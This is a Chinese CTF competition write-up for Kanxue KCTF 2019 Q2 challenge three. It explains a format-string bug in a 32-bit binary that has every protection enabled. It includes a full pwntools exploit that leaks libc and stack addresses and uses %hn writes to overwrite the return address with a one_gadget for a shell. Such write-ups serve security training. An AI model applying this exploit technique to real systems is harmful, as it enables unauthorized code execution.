2019看雪纽盾KCTF晋级赛Q2经过十四天的激烈比拼,于6月24日正午12点整正式宣告结束。
昨天我们公布了第一题神秘来信的题目解析,大家看过点评及其解析思路是不是觉得豁然开朗了呢?今天就让我们一起来看下第三题,看看如何去破解金字塔的诅咒,放大招!!!
经过长途跋涉,你来到坐落于尼罗河畔的神秘金字塔。这座已有4500多年历史的角锥体建筑物拔地而起,规模宏伟,结构精密,在一望无际的沙漠中格外的耀眼。即使经过千百年的打磨,金字塔自是岿然不动。
传说,外星人曾进入地球,由于飞船损坏,被迫降落在埃及。于是在建造了金字塔,想要建立与本身星球的联系,持续的向外太空发射电磁破。但是由于得不到及时的能量补给,他便死在这里,留下了一块能量宝石。
人类一直在尝试进入金字塔的内部一览真容,却屡屡失败。传说,金字塔已被“诅咒”,任何想要打开窥探的人,都将受到“诅咒”。你要如何破解这个诅咒,成功拿到宝石呢?祝你好运!
本题围观人数高达2020人,人气颇高,攻破人数为49人,看来第三题还是稍有难度的,没有第一题破解的人数多。
攻破此题的战队排名一览:
程序主函数很简单,含有很明显的格式化字符串漏洞。利用思路是泄漏libc和栈地址,来计算出one_gadget和保存返回地址的栈地址。可以修改环境变量地址为返回地址,然后写入onegadget,即可完成此题。
设计思路
本题出题战队卑微菜鸡队:
队伍简介:
黄瓜香蕉,个人学习两年半的个人安全研究者,擅长pwn,希望和各位大佬多多交流
这是一道format题目。
格式化字符串,进入ctf_xinetd后直接docker build -t name 。
在bin目录下放的是题目和flag文件
1. 题目保护机制全开
2. 题目存在两个选项输入和退出
3. 输入存在格式化字符串
4. 由于写入的的位置不在栈上,无法利用
5. 可以看到栈上存在libc_start_main返回地址,可以泄露libc地址
6. 下面的是环境变量的地址,我们可以修改环境变量地址为返回地址,然后写入onegadget
本题解题思路由看雪论坛jackandkx提供:
0x0 checksec
保护全开
[*] '/home/abc/Desktop/3/format' Arch: i386-32-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled
0x1 程序分析
程序一开始,作者就给出了亲切的问候:
puts("Welcome to kanxue 2019, your pwn like cxk");
主函数很简单:
int __cdecl main(int argc, const char **argv, const char **envp) { int idx; // eax char buf[4]; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h] [ebp-Ch] int *v7; // [esp+8h] [ebp-8h] v7 = &argc; v6 = __readgsdword(0x14u); setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); puts("Welcome to kanxue 2019, your pwn like cxk"); do { while ( 1 ) { menu(); read(0, buf, 4u); idx = atoi(buf); if ( idx != 1 ) break; printf("What do tou want to say:"); read_input((int)echo, 24); printf(echo); puts((const char *)&unk_5655FA97); } } while ( idx != 2 ); return 0; }
很明显的格式化字符串漏洞,format string是个全局变量:
.bss:5656100C ; char echo[24] .bss:5656100C echo db 18h dup(?) ; DATA XREF: main+B2↑o
0x2 利用思路
首先栈上有libc和栈地址,先把这两个泄露出来,计算出one_gadget和保存返回地址的栈地址。
主要思路:利用%n参数改写main函数返回地址为one_gadget。
然而栈上并没有指向返回地址的值,所以我们要自己构造出来。
构造方法:
1. 通过调试,找到一个保存在栈上的栈指针,而且这个栈指针指向的值也是一个栈上的地址(因为%n测试时只能写入两个字节的值,写4个字节会失败?)。
2. %n参数修改这个栈指针指向的栈地址的低16位为&ret_addr的低16位,这样,这个栈地址就和&ret_addr一样了。
3. %n参数修改ret_addr低16位为one_gadget低16位。
4. %n参数修改这个栈指针指向的栈地址的低16位为&ret_addr+2的低16位。
5. %n参数修改ret_addr高16位为one_gadget高16位。
最后程序返回,执行One_gadget拿到shell。
0x3 完整EXP
from pwn import * import pdb # context.log_level = 'debug' one_gadget = 0x5f065 # one_gadget = 0x5fbc5 # p = process('./format') p = remote('152.136.18.34',9999) p.recvuntil('Choice:') p.sendline('1') p.recvuntil('say:') payload = '%3$p %5$p %11$p' p.sendline(payload) s = p.recvuntil('Choice').split(' ') s[2] = s[2][:10] elf_base = int(s[0],16)-0x8f3 ret_addr = int(s[1],16)-0x98 libc_base = int(s[2],16)-0x18637 print hex(elf_base) print hex(ret_addr) print hex(libc_base) p.sendline('1') p.recvuntil('say:') payload = r'%.{:d}x%5$hn'.format(ret_addr&0xffff) # print payload p.sendline(payload) p.recvuntil('Choice') p.sendline('1') p.recvuntil('say:') payload = r'%.{:d}x%53$hn'.format((libc_base+one_gadget)&0xffff) # print payload p.sendline(payload) p.recvuntil('Choice') p.sendline('1') p.recvuntil('say:') payload = r'%.{:d}x%5$hn'.format((ret_addr+2)&0xffff) # print payload p.sendline(payload) p.recvuntil('Choice') p.sendline('1') p.recvuntil('say:') # pdb.set_trace() payload = r'%.{:d}x%53$hn'.format(((libc_base+one_gadget)>>16)&0xffff) # print payload p.sendline(payload) p.recvuntil('Choice') p.sendline('2') p.interactive() # abc@vm:~/Desktop/3$ python exp.py # [+] Opening connection to 152.136.18.34 on port 9999: Done # 0x56572000 # 0xffa4cd8c # 0xf7d7c000 # [*] Switching to interactive mode # :$ ls # bin # dev # flag # format # lib # lib32 # lib64 # $ cat flag # flag{c6671fc0-cea3-42ef-8af0-c20c65f854be}
主办方
看雪学院(http://www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的开发者社区!创建于2000年,历经19年的发展,受到业内的广泛认同,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
合作伙伴
上海纽盾科技股份有限公司成立于2009年,是一家以“网络安全”为主轴,以“科技源自生活,纽盾服务社会”为核心经营理念,以网络安全产品的研发、生产、销售、售后服务与相关安全服务为一体的专业安全公司,致力于为数字化时代背景下的用户提供安全产品、安全服务以及等级保护等安全解决方案。